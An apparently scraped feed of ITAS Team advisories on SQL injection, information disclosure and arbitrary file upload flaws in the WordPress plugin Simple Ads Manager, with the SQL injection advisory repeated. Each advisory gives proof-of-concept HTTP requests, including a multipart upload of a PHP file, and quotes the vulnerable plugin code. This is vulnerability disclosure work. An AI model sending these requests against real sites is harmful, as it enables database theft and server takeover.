                                  $values .= ((empty($values)) ? '' : ', ')
. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
                          }
                          $sql = "INSERT INTO $sTable (id, pid, event_time,
event_type, remote_addr) VALUES {$values};";
                          $result = $wpdb->query($sql);
                          if($result > 0) echo json_encode(array('success'
=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
                          else echo json_encode(array(
                                  'success' => false,
                                  'result' => $result,
                                  'sql' => $sql,
                                  'hits' => $hits,
                                  'values' => $values
                          ));   
                  }
                  break;




---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
      $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
      $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :
'Post';
      $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :
'Page';

      //set @row_num = 0;
      //SELECT @row_num := @row_num + 1 AS recid
      $sql = "SELECT
                wp.id,
                wp.post_title AS title,
                wp.post_type AS type
              FROM
                $postTable wp
              WHERE
                wp.post_status = 'publish' AND
                FIND_IN_SET(wp.post_type, 'post,page{$custs}')
              ORDER BY wp.id;";

      $posts = $wpdb->get_results($sql, ARRAY_A);

      $k = 0;
      foreach($posts as &$val) {
        switch($val['type']) {
          case 'post':
            $val['type'] = $sPost;
            break;
          case 'page':
            $val['type'] = $sPage;
            break;
          default:
            $val['type'] = $sPost . ': '.$val['type'];
            break;
        }
        $k++;
        $val['recid'] = $k;
      }
      $out = array(
        'status' => 'success',
        'total' => count($posts),
        'records' => $posts
      );
      break;



---SQL INJECTION 3---
+REQUEST:

POST
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL
INJECTION HERE> HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

action=load_combo_data

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+Vulnerable code: from line 225 to 255
    case 'sam_ajax_load_combo_data':
      $page = $_GET['page'];
      $rows = $_GET['rows'];
      $searchTerm = $_GET['searchTerm'];
      $offset = ((int)$page - 1) * (int)$rows;
      $sql = "SELECT
                wu.id,
                wu.display_name AS title,
                wu.user_nicename AS slug,
                wu.user_email AS email
              FROM
                $uTable wu
              WHERE wu.user_nicename LIKE '{$searchTerm}%'
              ORDER BY wu.id
              LIMIT $offset, $rows;";
      $users = $wpdb->get_results($sql, ARRAY_A);
      $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE
'{$searchTerm}%';";
      $rTotal = $wpdb->get_var($sql);
      $total = ceil((int)$rTotal/(int)$rows);
      $out = array(
        'page' => $page,
        'records' => count($users),
        'rows' => $users,
        'total' => $total,
        'offset' => $offset
      );
      break;




---SQL INJECTION 4---

+ REQUEST

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION
HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL
INJECTION HERE>&sadmin=<SQL INJECTION HERE>

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php

+ Vulnerable code: from line 188 to 223
    case 'sam_ajax_load_users':
      $roleSubscriber = (isset($_REQUEST['subscriber'])) ?
urldecode($_REQUEST['subscriber']) : 'Subscriber';
      $roleContributor = (isset($_REQUEST['contributor'])) ?
urldecode($_REQUEST['contributor']) : 'Contributor';
      $roleAuthor = (isset($_REQUEST['author'])) ?
urldecode($_REQUEST['author']) : 'Author';
      $roleEditor = (isset($_REQUEST['editor'])) ?
urldecode($_REQUEST['editor']) : 'Editor';
      $roleAdministrator = (isset($_REQUEST["admin"])) ?
urldecode($_REQUEST["admin"]) : 'Administrator';
      $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?
urldecode($_REQUEST['sadmin']) : 'Super Admin';
      $sql = "SELECT
                wu.id,
                wu.display_name AS title,
                wu.user_nicename AS slug,
                (CASE wum.meta_value
                  WHEN 0 THEN '$roleSubscriber'
                  WHEN 1 THEN '$roleContributor'
                  WHEN 2 THEN '$roleAuthor'
                  ELSE
                    IF(wum.meta_value > 2 AND wum.meta_value <= 7,
'$roleEditor',
                      IF(wum.meta_value > 7 AND wum.meta_value <= 10,
'$roleAdministrator',
                        IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
                      )
                    )
                END) AS role
              FROM $uTable wu
              INNER JOIN $umTable wum
                ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
              ORDER BY wu.id;";
      $users = $wpdb->get_results($sql, ARRAY_A);
      $k = 0;
      foreach($users as &$val) {
        $k++;
        $val['recid'] = $k;
      }
      $out = $users;
      break;




Best Regards
-----------------------------------
ITAS Team (www.itas.vn)

↧

Wordpress plugin Simple Ads Manager - Information Disclosure

April 2, 2015, 7:12 am

≫ Next: Wordpress plugin Simple Ads Manager - Arbitrary File Upload

≪ Previous: Wordpress plugin Simple Ads Manager - SQL Injection

#Vulnerability title: Wordpress plugin Simple Ads Manager - Information
Disclosure
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID:  CVE-2015-2826
#Author: Nguyen Hung Tuan (tuan.h.nguyen () itas vn) & ITAS Team


::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

action=load_users



+ Function list: load_users, load_authors, load_cats, load_tags, load_posts,
posts_debug, load_stats,...
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Image: http://www.itas.vn/uploads/newsother/disclosure.png

+ REFERENCE: 
-
http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilitie
s-in-Hakin9-IT-Security-Magazine-78.html?language=en


Best regard
--------------------------------
ITAS Team (www.itas.vn)

↧

Wordpress plugin Simple Ads Manager - Arbitrary File Upload

April 2, 2015, 7:13 am

≫ Next: Wordpress plugin Simple Ads Manager - Multiple SQL Injection

≪ Previous: Wordpress plugin Simple Ads Manager - Information Disclosure

#Vulnerability title: Wordpress plugin Simple Ads Manager - Arbitrary File
Upload
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2825
#Author: Tran Dinh Tien (tien.d.tran () itas vn) & ITAS Team


::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: targer.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: multipart/form-data;
boundary=---------------------------108989518220095255551617421026
Content-Length: 683

-----------------------------108989518220095255551617421026
Content-Disposition: form-data; name="uploadfile"; filename="info.php"
Content-Type: application/x-php

<?php phpinfo(); ?>
-----------------------------108989518220095255551617421026
Content-Disposition: form-data; name="action"

upload_ad_image
-----------------------------108989518220095255551617421026-


+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php

+ Vulnerable code: from line 303 to 314

    case 'sam_ajax_upload_ad_image':
      if(isset($_POST['path'])) {
        $uploadDir = $_POST['path'];
        $file = $uploadDir . basename($_FILES['uploadfile']['name']);

        if ( move_uploaded_file( $_FILES['uploadfile']['tmp_name'], $file ))
{
          $out = array('status' => "success");
        } else {
          $out = array('status' => "error");
        }
      }
      break;


+ REFERENCE: 
-
http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilitie
s-in-Hakin9-IT-Security-Magazine-78.html?language=en
- https://www.youtube.com/watch?v=8IU9EtUTkxI


Best regard
--------------------
ITAS Team (www.itas.vn)

↧

Wordpress plugin Simple Ads Manager - Multiple SQL Injection

April 2, 2015, 7:14 am

≫ Next: Cryptographic Service Providers in France Have To Abide By A New Law

≪ Previous: Wordpress plugin Simple Ads Manager - Arbitrary File Upload

#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL
Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link:
https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h.le () itas vn) & ITAS Team


::PROOF OF CONCEPT::

---SQL INJECTION 1---

+ REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101
Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;
PHPSESSID=kqvtir87g33e2ujkc290l5bmm7;
cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION
HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL
INJECTION HERE>&level=3


- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:

          case 'sam_ajax_sam_hits':
                  if(isset($_POST['hits']) && is_array($_POST['hits'])) {
                          $hits = $_POST['hits'];
                          $values = '';
                          $remoteAddr = $_SERVER['REMOTE_ADDR'];
                          foreach($hits as $hit) {
                                  $values .= ((empty($values)) ? '' : ', ')
. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
                          }
                          $sql = "INSERT INTO $sTable (id, pid, event_time,
event_type, remote_addr) VALUES {$values};";
                          $result = $wpdb->query($sql);
                          if($result > 0) echo json_encode(array('success'
=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
                          else echo json_encode(array(
                                  'success' => false,
                                  'result' => $result,
                                  'sql' => $sql,
                                  'hits' => $hits,
                                  'values' => $values
                          ));   
                  }
                  break;




---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
      $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
      $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :
'Post';
      $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :
'Page';

      //set @row_num = 0;
      //SELECT @row_num := @row_num + 1 AS recid
      $sql = "SELECT
                wp.id,
                wp.post_title AS title,
                wp.post_type AS type
              FROM
                $postTable wp
              WHERE
                wp.post_status = 'publish' AND
                FIND_IN_SET(wp.post_type, 'post,page{$custs}')
              ORDER BY wp.id;";

      $posts = $wpdb->get_results($sql, ARRAY_A);

      $k = 0;
      foreach($posts as &$val) {
        switch($val['type']) {
          case 'post':
            $val['type'] = $sPost;
            break;
          case 'page':
            $val['type'] = $sPage;
            break;
          default:
            $val['type'] = $sPost . ': '.$val['type'];
            break;
        }
        $k++;
        $val['recid'] = $k;
      }
      $out = array(
        'status' => 'success',
        'total' => count($posts),
        'records' => $posts
      );
      break;



---SQL INJECTION 3---
+REQUEST:

POST
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL
INJECTION HERE> HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

action=load_combo_data

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+Vulnerable code: from line 225 to 255
    case 'sam_ajax_load_combo_data':
      $page = $_GET['page'];
      $rows = $_GET['rows'];
      $searchTerm = $_GET['searchTerm'];
      $offset = ((int)$page - 1) * (int)$rows;
      $sql = "SELECT
                wu.id,
                wu.display_name AS title,
                wu.user_nicename AS slug,
                wu.user_email AS email
              FROM
                $uTable wu
              WHERE wu.user_nicename LIKE '{$searchTerm}%'
              ORDER BY wu.id
              LIMIT $offset, $rows;";
      $users = $wpdb->get_results($sql, ARRAY_A);
      $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE
'{$searchTerm}%';";
      $rTotal = $wpdb->get_var($sql);
      $total = ceil((int)$rTotal/(int)$rows);
      $out = array(
        'page' => $page,
        'records' => count($users),
        'rows' => $users,
        'total' => $total,
        'offset' => $offset
      );
      break;




---SQL INJECTION 4---

+ REQUEST

POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION
HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL
INJECTION HERE>&sadmin=<SQL INJECTION HERE>

+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php

+ Vulnerable code: from line 188 to 223
    case 'sam_ajax_load_users':
      $roleSubscriber = (isset($_REQUEST['subscriber'])) ?
urldecode($_REQUEST['subscriber']) : 'Subscriber';
      $roleContributor = (isset($_REQUEST['contributor'])) ?
urldecode($_REQUEST['contributor']) : 'Contributor';
      $roleAuthor = (isset($_REQUEST['author'])) ?
urldecode($_REQUEST['author']) : 'Author';
      $roleEditor = (isset($_REQUEST['editor'])) ?
urldecode($_REQUEST['editor']) : 'Editor';
      $roleAdministrator = (isset($_REQUEST["admin"])) ?
urldecode($_REQUEST["admin"]) : 'Administrator';
      $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?
urldecode($_REQUEST['sadmin']) : 'Super Admin';
      $sql = "SELECT
                wu.id,
                wu.display_name AS title,
                wu.user_nicename AS slug,
                (CASE wum.meta_value
                  WHEN 0 THEN '$roleSubscriber'
                  WHEN 1 THEN '$roleContributor'
                  WHEN 2 THEN '$roleAuthor'
                  ELSE
                    IF(wum.meta_value > 2 AND wum.meta_value <= 7,
'$roleEditor',
                      IF(wum.meta_value > 7 AND wum.meta_value <= 10,
'$roleAdministrator',
                        IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
                      )
                    )
                END) AS role
              FROM $uTable wu
              INNER JOIN $umTable wum
                ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
              ORDER BY wu.id;";
      $users = $wpdb->get_results($sql, ARRAY_A);
      $k = 0;
      foreach($users as &$val) {
        $k++;
        $val['recid'] = $k;
      }
      $out = $users;
      break;

REFERENCE: 
+ https://www.youtube.com/watch?v=HPJ1r9dhIB4


Best Regards
-----------------------------------
ITAS Team (www.itas.vn)

↧